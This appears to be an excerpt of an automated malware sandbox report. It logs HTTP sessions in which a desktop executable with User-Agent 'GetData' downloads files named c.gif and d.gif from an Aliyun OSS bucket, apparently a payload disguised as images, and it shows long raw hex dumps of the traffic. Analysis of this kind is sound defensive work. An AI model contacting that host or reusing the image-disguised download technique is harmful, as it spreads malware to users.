                                    2025-01-09 00:47:26 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                    Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                    2025-01-09 00:47:26 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                    Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                    2025-01-09 00:47:26 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                    Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                    2025-01-09 00:47:26 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                    Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                    2025-01-09 00:47:26 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                    Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                    2025-01-09 00:47:26 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                    Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                    2025-01-09 00:47:26 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                    Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                    2025-01-09 00:47:26 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                    Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                    2025-01-09 00:47:26 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                    Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.45043559.110.190.444435956C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-09 00:47:27 UTC111OUTGET /c.gif HTTP/1.1
                                    User-Agent: GetData
                                    Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-09 00:47:28 UTC546INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Thu, 09 Jan 2025 00:47:28 GMT
                                    Content-Type: image/gif
                                    Content-Length: 10681
                                    Connection: close
                                    x-oss-request-id: 677F1C9F6AD6D537349FC430
                                    Accept-Ranges: bytes
                                    ETag: "10A818386411EE834D99AE6B7B68BE71"
                                    Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10287299869673359293
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                    x-oss-server-time: 17
                                    2025-01-09 00:47:28 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-09 00:47:28 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                    Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                    2025-01-09 00:47:28 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                    Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.45044559.110.190.444435956C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-09 00:47:29 UTC111OUTGET /d.gif HTTP/1.1
                                    User-Agent: GetData
                                    Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-09 00:47:29 UTC547INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Thu, 09 Jan 2025 00:47:29 GMT
                                    Content-Type: image/gif
                                    Content-Length: 3892010
                                    Connection: close
                                    x-oss-request-id: 677F1CA19AB67D3732A52767
                                    Accept-Ranges: bytes
                                    ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                    Last-Modified: Wed, 08 Jan 2025 11:04:19 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 3363616613234190325
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                    x-oss-server-time: 23
                                    2025-01-09 00:47:29 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-09 00:47:29 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                    Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                    2025-01-09 00:47:29 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                    Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                    2025-01-09 00:47:29 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                    Data Ascii: -J;wuwu{}uG`uWu{Q6
                                    2025-01-09 00:47:29 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                    Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                    2025-01-09 00:47:29 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                    Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
